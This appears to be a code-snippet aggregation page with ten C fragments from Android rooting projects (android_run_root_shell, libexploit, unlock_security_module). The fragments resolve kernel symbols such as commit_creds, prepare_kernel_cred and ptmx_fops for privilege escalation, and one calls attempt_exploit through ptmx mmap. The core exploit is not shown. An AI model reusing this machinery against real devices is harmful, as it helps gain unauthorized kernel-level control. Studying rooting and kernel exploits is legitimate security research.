コード例 #1
0
static bool
setup_param_from_database(void)
{
  int i;

  if (mmc_protect_part) {
    if (mmc_protect_part_type == MMC_PROTECT_PART_TYPE1
     || mmc_protect_part_type == MMC_PROTECT_PART_TYPE2
     || mmc_protect_part_type == MMC_PROTECT_PART_TYPE3) {
      return true;
    }
  }

  mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part));
  if (!mmc_protect_part) {
    detect_mmc_protect();

    mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part));
  }

  mmc_protect_part_type = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect.part_type));

  if (mmc_protect_part) {
    if (mmc_protect_part_type == MMC_PROTECT_PART_TYPE1
     || mmc_protect_part_type == MMC_PROTECT_PART_TYPE2
     || mmc_protect_part_type == MMC_PROTECT_PART_TYPE3) {
      return true;
    }
  }

  mmc_protect_part = 0;
  mmc_protect_part_type = MMC_PROTECT_PART_TYPE_UNKNOWN;

  return false;
}
コード例 #2
0
static bool
get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address)
{
    *prepare_kernel_cred_address = (void *)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred));
    *commit_creds_address = (void*)device_get_symbol_address(DEVICE_SYMBOL(commit_creds));

    if (*prepare_kernel_cred_address && *commit_creds_address) {
        return true;
    }

    print_reason_device_not_supported();

    return false;
}
コード例 #3
0
bool
device_set_symbol_address(device_symbol_t symbol, unsigned long int address)
{
  device_id_t device_id;
  unsigned long int old;
  sqlite3_stmt *st;
  int rc;

  if (address == 0) {
    return false;
  }

  old = device_get_symbol_address(symbol);
  if (old == address) {
    return true;
  }

  if (old) {
    printf("Duplicate symbol \"%s\": old = 0x%08x, new = 0x%08x\n", symbol, old, address);
    return false;
  }

  device_id = get_device_id(true);

  rc = sqlite3_prepare(db, SQL_REGISTER_DEVICE_ADDRESS, -1, &st, NULL);

  if (!IS_SQL_ERROR(rc)) {
    rc = sqlite3_reset(st);
  }

  if (!IS_SQL_ERROR(rc)) {
    rc = sqlite3_bind_int(st, 1, device_id);
  }

  if (!IS_SQL_ERROR(rc)) {
    rc = sqlite3_bind_text(st, 2, symbol, -1, SQLITE_STATIC);
  }

  if (!IS_SQL_ERROR(rc)) {
    char hex_address[20] = { 0 };
    int length = snprintf(hex_address, sizeof(hex_address), "0x%08lx", address);
    rc = sqlite3_bind_text(st, 3, hex_address, length, SQLITE_STATIC);
  }

  if (!IS_SQL_ERROR(rc)) {
    rc = execute_sql(st);
  }

  if (IS_SQL_ERROR(rc)) {
    printf("%s(%d)\n", sqlite3_errmsg(db), sqlite3_errcode(db));
    sqlite3_finalize(st);

    return false;
  }

  sqlite3_finalize(st);

  return true;
}
コード例 #4
0
static void *
get_delayed_rsp_id_addresses(void)
{
  void *value;

  value = (void *)device_get_symbol_address(DEVICE_SYMBOL(delayed_rsp_id));
  if (value) {
    return value;
  }

  print_reason_device_not_supported();

  return NULL;
}
コード例 #5
0
ファイル: mm.c プロジェクト: qiuqi/android_run_root_shell 
bool
setup_remap_pfn_range_address(void)
{
  if (remap_pfn_range) {
    return true;
  }

  remap_pfn_range = (void *)device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range));

  if (!remap_pfn_range && kallsyms_exist()) {
    remap_pfn_range = kallsyms_get_symbol_address("remap_pfn_range");
  }

  return !!remap_pfn_range;
}
コード例 #6
0
bool
setup_vmalloc_exec_address(void)
{
  if (vmalloc_exec) {
    return true;
  }

  vmalloc_exec = (void *)device_get_symbol_address(DEVICE_SYMBOL(vmalloc_exec));

  if (!vmalloc_exec && kallsyms_exist()) {
    vmalloc_exec = (void *)kallsyms_get_symbol_address("vmalloc_exec");
  }

  return !!vmalloc_exec;
}
コード例 #7
0
ファイル: exploit.c プロジェクト: bincker/libexploit 
static unsigned long int
get_kernel_physical_offset(void)
{
  unsigned long int offset;

  offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
  if (!offset) {
    offset = find_kernel_text_from_iomem();
  }

  if (offset) {
    return offset;
  }

  return default_kernel_physical_offset;
}
コード例 #8
0
ファイル: ptmx.c プロジェクト: Velmy/unlock_security_module 
static unsigned long int
get_ptmx_fops_address(void)
{
  unsigned long int address;

  address = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops));
  if (address) {
    return address;
  }

  if (kallsyms_exist()) {
    address = kallsyms_get_symbol_address("ptmx_fops");
    if (address) {
      return address;
    }
  }

  return 0;
}
コード例 #9
0
static bool
setup_variables(void)
{
  kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
  if (kernel_physical_offset) {
    return true;
  }

  kernel_physical_offset = find_kernel_text_from_iomem();
  if (kernel_physical_offset) {
    return true;
  }

  kernel_physical_offset = find_kernel_text_from_config();
  if (kernel_physical_offset) {
    return true;
  }

  print_reason_device_not_supported();
  return false;
}
コード例 #10
0
ファイル: mm.c プロジェクト: qiuqi/android_run_root_shell 
bool
run_with_mmap(memory_callback_t callback)
{
  unsigned long int kernel_physical_offset;
  bool result;

  if (run_exploit_mmap(callback, &result)) {
    return result;
  }

  setup_remap_pfn_range_address();

  if (!remap_pfn_range) {
    printf("You need to manage to get remap_pfn_range addresses.\n");
    return false;
  }

  setup_ptmx_fops_mmap_address();
  if (!ptmx_fops_mmap_address) {
    printf("You need to manage to get ptmx_fops addresses.\n");
    return false;
  }

  kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
  if (kernel_physical_offset) {
    set_kernel_phys_offset(kernel_physical_offset - 0x00008000);
  }
  else if (!detect_kernel_phys_parameters()) {
    printf("You need to manage to get kernel_physical_offset addresses.\n");
    return false;
  }

  return attempt_exploit(ptmx_fops_mmap_address,
                         (unsigned long int)&ptmx_mmap, 0,
			 run_callback_with_mmap, callback);
}